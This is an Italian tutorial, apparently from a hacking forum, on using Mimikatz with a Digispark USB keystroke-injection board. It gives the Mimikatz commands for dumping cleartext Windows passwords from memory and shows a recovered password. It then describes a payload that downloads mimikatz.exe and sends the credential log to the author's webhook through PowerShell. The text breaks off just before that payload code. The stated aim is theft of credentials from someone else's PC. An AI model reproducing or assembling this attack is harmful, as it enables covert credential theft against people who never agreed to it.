Guida Mimikatz e Digispark

22 Febbraio 2022
475
42
353
350
Ultima modifica:
Introduzione
Se avete visto Mr. Robot vi ricordete sicuramente di quando Angela doveva smanettare con la femtocella e che se non ci fosse riuscita avrebbe dovuto prendere una Rubber ducky con dentro Mimikatz e metterla in un PC dell'FBI, oggi facciamo la stessa cosa ma con la Digispark.

Mimikatz
Katz è un Exploit scritto in C per Windows che riesce ad estrarre hash, pin, password in chiaro e molto altro dalla RAM, Scarichiamo il file .zip da Github ed estraiamo la cartella x64 se il nostro Windows è a 64 bit o Win32 se è a 32 bit; io lavoro da Windows 7 in virtual machine quindi userò quest'ultimo, runniamolo come Adminastrator facendo clic destro e andando sulla voce Run as administrator, Ora siamo pronti ad usare l'exploit, scriviamo:
Codice:
privilege::debug
log
sekurlsa::logonpassword
mimikatz.png

Col primo comando verifichiamo se abbiamo i diritti di root, se esceprivilege '20' OK possiamo continuare, poi creiamo un file di log, dove verranno registrati tutti i comandi con i relativi input e infine col terzo mostriamo a schermo tutte le password che Windows salva in chiaro nella RAM:
pass-win7-mimikatz.png

Se scorriamo giù possiamo vedere la password dell'account Windows: Passw0rd!
Se ben ricordate, col, comando log, abbiamo creato un file .log, quel file contiene tutto l'input e output della shell di mimikatz, quindi per completare il nostro attacco basta inviarci quel file su webhook tramite il powershell.

Creazione del Payload
Ora programmiamo con Wiring un payload che andrà a scaricare mimikatz.exe e invierà il file di log al nostro sito webhook con powershell
Apriamo l'IDE di Arduino e iniziamo a programmare, ci servirà la libreria KeybaordES.h, si può scaricare da qui, per poterla usare la si deve aggiungere alla cartella appdata>local>arduino 15>packages>digistump>hardware>avr>libraries>digisparkkeyboard, questo è il codice: